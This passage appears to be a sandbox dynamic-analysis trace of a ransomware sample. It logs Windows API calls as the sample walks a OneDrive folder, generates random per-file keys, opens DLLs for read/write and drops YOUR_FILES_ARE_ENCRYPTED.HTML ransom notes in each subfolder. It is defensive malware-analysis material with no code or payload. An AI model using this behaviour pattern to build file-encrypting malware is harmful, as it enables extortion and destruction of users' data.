out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5096097b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5096097b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50a920f2, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x238c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncConfig.exe", cAlternateFileName="FILESY~1.EXE")) returned 1 [0112.906] StrStrIW (lpFirst="FileSyncConfig.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.906] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncConfig.exe") returned 94 [0112.906] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0112.907] lstrlenW (lpString=".exe") returned 4 [0112.907] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0112.907] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ade11a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50ade11a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50fc8d11, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1464c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncSessions.dll", cAlternateFileName="FIFC38~1.DLL")) returned 1 [0112.907] StrStrIW (lpFirst="FileSyncSessions.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.907] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncSessions.dll") returned 96 [0112.907] PathFindExtensionW (pszPath="FileSyncSessions.dll") returned=".dll" [0112.907] lstrlenW (lpString=".dll") returned 4 [0112.907] PathFindExtensionW (pszPath="FileSyncSessions.dll") returned=".dll" [0112.907] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncSessions.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\filesyncsessions.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0112.909] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1336512) returned 1 [0112.909] GetProcessHeap () returned 0x600000 [0112.909] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32f02f8 [0112.911] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="FA") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="61") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="0D") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="CF") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="BF") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="35") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="A4") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="1B") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="40") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="00") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="CD") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="2B") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="E5") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="CF") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="87") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="8F") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="CB") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="6A") returned 2 [0112.911] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="64") returned 2 [0112.912] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="D4") returned 2 [0112.912] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="DB") returned 2 [0112.912] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="28") returned 2 [0112.912] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="A9") returned 2 [0112.912] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="26") returned 2 [0112.912] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="12") returned 2 [0112.912] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="06") returned 2 [0112.912] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="49") returned 2 [0112.912] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="09") returned 2 [0112.912] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="AF") returned 2 [0112.912] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="7C") returned 2 [0112.912] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="02") returned 2 [0112.912] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="47") returned 2 [0112.912] lstrcpyW (in: lpString1=0x33003ac, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncSessions.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncSessions.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncSessions.dll" [0112.912] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x32f02f8, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.912] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32f02f8, lpOverlapped=0x32f02f8) returned 1 [0112.913] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5103b5e0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5103b5e0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x511def4c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x182cc0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncShell.dll", cAlternateFileName="FI340C~1.DLL")) returned 1 [0112.913] StrStrIW (lpFirst="FileSyncShell.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.913] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncShell.dll") returned 93 [0112.913] PathFindExtensionW (pszPath="FileSyncShell.dll") returned=".dll" [0112.914] lstrlenW (lpString=".dll") returned 4 [0112.914] PathFindExtensionW (pszPath="FileSyncShell.dll") returned=".dll" [0112.914] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncShell.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\filesyncshell.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0112.917] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1584320) returned 1 [0112.917] GetProcessHeap () returned 0x600000 [0112.917] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32f02f8 [0112.918] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="72") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="8F") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="D5") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="8C") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="B8") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="48") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="A4") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="0B") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="DE") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="D8") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="18") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="52") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="1C") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="A3") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="28") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="D0") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="95") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="05") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="D5") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="2D") returned 2 [0112.918] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="D9") returned 2 [0112.919] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="4C") returned 2 [0112.919] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="E3") returned 2 [0112.919] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="EB") returned 2 [0112.919] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="C9") returned 2 [0112.919] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="FA") returned 2 [0112.919] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="89") returned 2 [0112.919] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="D8") returned 2 [0112.919] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="AA") returned 2 [0112.919] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="4B") returned 2 [0112.919] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="68") returned 2 [0112.919] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="35") returned 2 [0112.920] lstrcpyW (in: lpString1=0x33003ac, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncShell.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncShell.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncShell.dll" [0112.920] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x32f02f8, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.920] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32f02f8, lpOverlapped=0x32f02f8) returned 1 [0112.920] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c2bee50, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4c2bee50, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4c2bee50, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="is", cAlternateFileName="")) returned 1 [0112.920] StrStrIW (lpFirst="is", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.920] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\is") returned 78 [0112.920] GetProcessHeap () returned 0x600000 [0112.921] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x688490 [0112.922] lstrcpyW (in: lpString1=0x688490, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\is" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\is") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\is" [0112.922] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\is", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\is\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\is\\*" [0112.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\is\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c2bee50, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4c2bee50, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4c7a9cca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0112.922] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c2bee50, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4c2bee50, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4c7a9cca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0112.922] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c7a9cca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4c7a9cca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4caa4b91, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.922] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.922] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\is\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.922] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.922] lstrlenW (lpString=".mui") returned 4 [0112.922] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.922] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c7a9cca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4c7a9cca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4caa4b91, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.922] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0112.922] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.923] GetProcessHeap () returned 0x600000 [0112.923] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0112.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\is\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0112.923] WriteFile (in: hFile=0x308, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.924] CloseHandle (hObject=0x308) returned 1 [0112.924] GetProcessHeap () returned 0x600000 [0112.924] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0112.924] GetProcessHeap () returned 0x600000 [0112.924] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0112.924] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4cfdbdcf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4cfdbdcf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4cfdbdcf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="it", cAlternateFileName="")) returned 1 [0112.925] StrStrIW (lpFirst="it", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.925] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\it") returned 78 [0112.925] GetProcessHeap () returned 0x600000 [0112.925] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x688490 [0112.925] lstrcpyW (in: lpString1=0x688490, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\it" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\it") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\it" [0112.925] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\it", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\it\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\it\\*" [0112.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\it\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4cfdbdcf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4cfdbdcf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4e9ef895, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0112.925] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4cfdbdcf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4cfdbdcf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4e9ef895, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0112.925] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e9ef895, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4e9ef895, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4edf5bbb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.925] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.925] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\it\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.925] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.925] lstrlenW (lpString=".mui") returned 4 [0112.925] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.925] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e9ef895, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4e9ef895, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4edf5bbb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.925] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0112.925] wnsprintfW (in: pszDest=0x688490, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.925] GetProcessHeap () returned 0x600000 [0112.925] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0112.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\it\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0112.926] WriteFile (in: hFile=0x308, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.927] CloseHandle (hObject=0x308) returned 1 [0112.927] GetProcessHeap () returned 0x600000 [0112.927] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0112.927] GetProcessHeap () returned 0x600000 [0112.927] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0112.927] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f5b5174, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4f5b5174, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4f5b5174, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ja", cAlternateFileName="")) returned 1 [0112.927] StrStrIW (lpFirst="ja", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.927] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ja") returned 78 [0112.927] GetProcessHeap () returned 0x600000 [0112.928] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x688490 [0112.928] lstrcpyW (in: lpString1=0x688490, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ja" | out: 